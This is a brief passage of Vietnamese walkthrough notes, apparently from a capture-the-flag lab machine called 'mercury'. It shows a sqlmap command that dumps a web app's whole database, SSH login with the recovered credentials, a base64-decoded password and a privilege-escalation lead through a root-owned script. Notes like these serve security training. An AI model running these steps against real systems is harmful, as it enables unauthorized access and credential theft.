sqlmap -u http://10.0.2.7:8080/mercuryfacts/ -D mercury --dump-all -- batch Xuất hiện bản passwd và user Ta thấy được webmaster có tiềm năng nhất Cổng 22 nãy mở nên ta dùng ssh
Cứ cái txt nào hay hiện thì cứ cat ra nhé
Phía sau : là passwd đó ạ
Dấu = ta xác định nó là base64
echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d passwd là
Leo thang thôi kkk
Linuxmaster sử dụng bash là /usr/in/check_syslog.sh là root